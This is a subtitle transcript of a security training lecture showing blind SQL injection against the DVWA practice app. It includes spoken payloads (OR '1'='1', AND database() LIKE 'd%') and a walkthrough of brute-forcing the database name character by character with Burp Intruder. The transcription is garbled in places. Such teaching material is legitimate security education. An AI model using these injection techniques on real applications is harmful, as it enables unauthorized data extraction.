1
00:00:01,010 --> 00:00:07,700
OK, it's time we cover a blind squirrel injection so we already know what SQL injection is.

2
00:00:07,880 --> 00:00:10,910
We know how it works and we know how we can exploit it.

3
00:00:11,390 --> 00:00:14,060
But what is this injection?

4
00:00:14,750 --> 00:00:21,740
Well, let me show you let's navigate to our W a log in to our page.

5
00:00:24,620 --> 00:00:32,119
Navigate to blind Eskil injection, and if you remember how we actually managed to discover whether

6
00:00:32,119 --> 00:00:39,410
Enescu injection was present on an application or not is we used a single quote, and once we entered

7
00:00:39,410 --> 00:00:44,420
that single quote, it would give us an error or it would give us some error message or possibly even

8
00:00:44,420 --> 00:00:47,450
the query itself where the error occurs.

9
00:00:48,050 --> 00:00:52,440
That's how we would know that this input is not really getting filtered.

10
00:00:52,490 --> 00:00:56,390
Well, if I click submit on blindest injection.

11
00:00:59,510 --> 00:01:07,340
Nothing happens, it's as if this application is not vulnerable, doesn't give any error, we can type

12
00:01:07,340 --> 00:01:13,490
anything with as many single quotes as we want and nothing will happen.

13
00:01:13,760 --> 00:01:19,850
Any character that we input will just get processed by the application and it will retrieve the same

14
00:01:19,850 --> 00:01:21,030
page back to us.

15
00:01:21,890 --> 00:01:24,920
So does that mean that it's not vulnerable?

16
00:01:25,490 --> 00:01:31,010
Well, it could be that there is also blindest conjecture injection, which means it's not giving us

17
00:01:31,010 --> 00:01:34,550
any error back, but it's still vulnerable to the scale injection.

18
00:01:35,480 --> 00:01:42,890
OK, but how can we figure out whether the skull injection is present in this application?

19
00:01:43,580 --> 00:01:46,320
Well, let's try specifying the correct input first.

20
00:01:46,330 --> 00:01:54,890
So if it just type one and click on submit, it will give me an idea of and it will give me its first

21
00:01:54,890 --> 00:01:56,390
name and last name.

22
00:01:56,420 --> 00:02:03,470
If I type, for example, to, I will give Gordon Brown and so on, so on so we can select one user

23
00:02:03,470 --> 00:02:06,410
ID right here and we get one output back.

24
00:02:07,390 --> 00:02:16,750
Same goes if we, for example, try one single coat or one equals one or one equals two, let's try

25
00:02:16,750 --> 00:02:20,740
it like that so we don't get admin back.

26
00:02:20,920 --> 00:02:23,020
But it could be due to two reasons.

27
00:02:24,010 --> 00:02:28,270
Reason number one, it's not vulnerable to injection or reason.

28
00:02:28,270 --> 00:02:35,890
Number two, it only this argument is satisfied if no one exists, but one is not equal to two.

29
00:02:36,130 --> 00:02:38,070
So this part is not satisfied.

30
00:02:38,080 --> 00:02:40,900
Therefore we only get the output for adding.

31
00:02:42,020 --> 00:02:53,360
But if we were to type one single coat or single coat, one single coat equals one press enter.

32
00:02:56,120 --> 00:02:59,220
We get all the users from the application.

33
00:02:59,630 --> 00:03:02,600
Now we don't get their usernames, passwords.

34
00:03:02,630 --> 00:03:06,260
However, we do get all of them out, put it right here.

35
00:03:06,560 --> 00:03:12,360
And this would be a good indication that there is a possible ESKIL injection in the application.

36
00:03:13,160 --> 00:03:13,590
Why?

37
00:03:14,090 --> 00:03:18,290
Well, because this application is not meant to output 20 users.

38
00:03:18,290 --> 00:03:19,580
It's only meant to output one.

39
00:03:20,030 --> 00:03:28,370
And with this statement, we told the application we want the ID number one or if one equals to one,

40
00:03:28,910 --> 00:03:35,690
and it gave us all the other I.D. And that is one of the ways we can discover whether it has some vulnerabilities

41
00:03:35,690 --> 00:03:36,470
in the application.

42
00:03:37,070 --> 00:03:38,840
Now, how can you explain this?

43
00:03:39,230 --> 00:03:41,180
Well, here is where the problem occurs.

44
00:03:41,420 --> 00:03:48,910
Exploiting blindest an injection is much, much longer and harder than exploiting an error based ESKIL

45
00:03:48,920 --> 00:03:49,460
injection.

46
00:03:50,470 --> 00:03:55,930
For example, here, we can't really output the database name.

47
00:03:56,140 --> 00:04:01,390
We need to guess because we're not getting any output back or any error back.

48
00:04:02,780 --> 00:04:10,300
So how can we go about getting the database named papal name, the column name and all of that?

49
00:04:11,120 --> 00:04:14,370
First of all, to keep in mind is that it takes a lot of time to do that.

50
00:04:14,390 --> 00:04:19,670
So for the purposes of this call, we will only show how we can get the database.

51
00:04:21,529 --> 00:04:31,670
To access the database we can use and Eskil like Operator and you can find it on this page, describes

52
00:04:31,670 --> 00:04:33,260
what exactly does it do?

53
00:04:33,720 --> 00:04:40,940
The like operator is used in our work force to search for a specified pattern in the column, since

54
00:04:40,940 --> 00:04:46,760
we don't really know how the database is called or we do actually know how it's called, but only because

55
00:04:46,760 --> 00:04:49,140
we exploited it in the previous lecture.

56
00:04:49,160 --> 00:04:51,170
We know that the database name is Steve.

57
00:04:52,160 --> 00:04:53,510
This is the name of the database.

58
00:04:53,720 --> 00:04:55,880
But let's pretend that we don't know it.

59
00:04:55,940 --> 00:04:59,740
We want to discover it by exploiting blindest conjecture.

60
00:05:00,690 --> 00:05:07,920
We could do it like this, we could type one single quote for the ID and database, since we know Israel

61
00:05:07,920 --> 00:05:17,670
has this database function and then this like operator, which has Syntex of open code, then the letter

62
00:05:17,670 --> 00:05:22,330
that you want to use, lets go with letter A and then the percent sign.

63
00:05:23,070 --> 00:05:24,090
What does this mean?

64
00:05:24,480 --> 00:05:31,890
Well, this line simply says that we're checking whether the database name starts with a and this person

65
00:05:31,900 --> 00:05:35,860
sign simply replaces all the other characters that could come after.

66
00:05:36,150 --> 00:05:41,730
So we're only checking whether the first letter of the database is a let's press enter.

67
00:05:43,600 --> 00:05:44,810
We get nothing back.

68
00:05:45,160 --> 00:05:45,820
Why is that?

69
00:05:46,630 --> 00:05:52,570
Well, it's because the first letter of database is not a therefore it didn't give us any output back

70
00:05:53,230 --> 00:06:03,430
if we were to type something like this and database and then we switch a with the because our database

71
00:06:03,430 --> 00:06:05,850
does start with the and the click submit.

72
00:06:06,340 --> 00:06:12,510
Now we get output back and now we would know that the database name starts with letter D.

73
00:06:13,390 --> 00:06:20,990
As you can only imagine, this can take a lot of time to guess and we could use the help of purposes

74
00:06:21,100 --> 00:06:21,640
to do this.

75
00:06:22,000 --> 00:06:23,310
So let's go to Burset.

76
00:06:24,160 --> 00:06:25,980
Let's turn on the intercept.

77
00:06:25,990 --> 00:06:26,770
Let's type.

78
00:06:28,160 --> 00:06:38,120
One, and perhaps we just type it in first and then I'm going to intercept someone and database like.

79
00:06:39,130 --> 00:06:39,420
Hey.

80
00:06:40,860 --> 00:06:48,210
Let's start with a once again just for the purposes of showing how this would work and then we intercept

81
00:06:48,210 --> 00:06:48,780
the request.

82
00:06:49,970 --> 00:06:53,450
Now we want to send this request to intruder.

83
00:06:54,920 --> 00:06:59,330
Let's hope that we can turn off the intercept and go back to the intruder.

84
00:07:00,380 --> 00:07:07,200
We want to select the positions and here we want to clear all of these positions, find the letter A.

85
00:07:07,370 --> 00:07:14,330
which is right here, and then add a position to it, since that is the only thing that we want to use

86
00:07:14,330 --> 00:07:15,170
as our paillard.

87
00:07:16,310 --> 00:07:21,660
Once we do that, we want to go to payloads and here we want to load all of the letters possible, so

88
00:07:21,670 --> 00:07:31,610
we'll just go A, B, C, D, E, F, G, and here I loaded all of the possible letters that could be

89
00:07:31,610 --> 00:07:33,350
the first letter of the database.

90
00:07:34,040 --> 00:07:39,800
So once without all the letters, we want to go to options.

91
00:07:40,580 --> 00:07:43,910
And here in the correct match, we can clear everything.

92
00:07:45,830 --> 00:07:54,740
And ad, for example, ad, so if we find the word admin in the page, then we're going to assume that

93
00:07:55,070 --> 00:07:56,360
we found the correct letter.

94
00:07:56,780 --> 00:07:57,470
Why is that?

95
00:07:57,740 --> 00:08:04,580
Well, if we get the correct output, it will output this that has admin right here.

96
00:08:05,150 --> 00:08:10,280
Or matter of fact, just so we can get even clearer response, let's copy this and parse string, which

97
00:08:10,280 --> 00:08:14,750
is first name Edman, and let's face it right here.

98
00:08:17,290 --> 00:08:25,510
Then we add it right here, and if our response finds this string inside of the code, that means we

99
00:08:25,510 --> 00:08:26,520
found the correct letter.

100
00:08:27,310 --> 00:08:29,920
All we need to do right now is start the attack.

101
00:08:33,470 --> 00:08:41,390
And here it is, we already get our response letter, the is checked, it has first name admin in the

102
00:08:41,530 --> 00:08:42,380
family response.

103
00:08:42,740 --> 00:08:49,010
It also has a different length of the response than all the other letters, as we can see right here.

104
00:08:49,580 --> 00:08:53,180
Now that we guessed the first letter, we would cancel this.

105
00:08:53,600 --> 00:09:02,300
We would go back to the positions and we would, first of all, clear this, remove the A and type the

106
00:09:02,810 --> 00:09:05,740
after type the we once again type it.

107
00:09:06,230 --> 00:09:13,670
Then we select a once again as the second letter since we already guessed first and now our command

108
00:09:13,670 --> 00:09:14,840
looks something like this.

109
00:09:16,460 --> 00:09:18,680
One and database

110
00:09:21,980 --> 00:09:28,550
like open quote the A percent, now we're guessing the second letter.

111
00:09:29,330 --> 00:09:35,730
OK, if I submit this for once again, not give any back because A is not the second letter.

112
00:09:36,140 --> 00:09:38,980
So let's see which letter is the second one.

113
00:09:39,530 --> 00:09:40,850
We can start the attack.

114
00:09:42,400 --> 00:09:44,170
Let's wait for this to finish.

115
00:09:45,470 --> 00:09:49,670
And here it is, a letter V is the second letter.

116
00:09:50,710 --> 00:09:53,290
Now we can go on to the third letter.

117
00:09:56,650 --> 00:10:01,450
So the B A, we once again selected.

118
00:10:02,830 --> 00:10:03,900
We started the attack.

119
00:10:06,780 --> 00:10:12,150
And here it is, it appears that W. is the next or third the latter.

120
00:10:12,960 --> 00:10:14,610
Let's add it right here.

121
00:10:17,650 --> 00:10:23,080
And let's add a at the end, select A and from the attack once again.

122
00:10:25,230 --> 00:10:32,450
And we get the response straight away, a is the fourth letter now we got the full name of the database.

123
00:10:32,730 --> 00:10:39,480
Now if we try to type like this and database like.

124
00:10:41,250 --> 00:10:42,390
Dve e

125
00:10:45,450 --> 00:10:52,740
submit, now we get the response back and here we can see that this is the name of our database and

126
00:10:52,740 --> 00:10:57,280
you will have to do this for every database, name, table, name and all of that.

127
00:10:58,080 --> 00:11:02,860
So now you notice why this is much longer to perform and much harder.

128
00:11:03,300 --> 00:11:05,000
Nonetheless, we covered it.

129
00:11:05,010 --> 00:11:06,240
We know how it works.

130
00:11:06,510 --> 00:11:13,200
We know that if we don't get any error once we specify the input doesn't mean that there is no ESKIL

131
00:11:13,200 --> 00:11:13,690
injection.

132
00:11:14,550 --> 00:11:20,700
We can also try something like making the application sleep for three seconds, which is also an indication

133
00:11:20,700 --> 00:11:27,000
that there could be an actual injection if the application does slip for three seconds after our comment

134
00:11:27,840 --> 00:11:28,600
nonetheless.

135
00:11:29,130 --> 00:11:30,540
Thank you for watching this lecture.

136
00:11:30,540 --> 00:11:37,530
And in the next video, we're going to start off with XML XPath Injection Suder.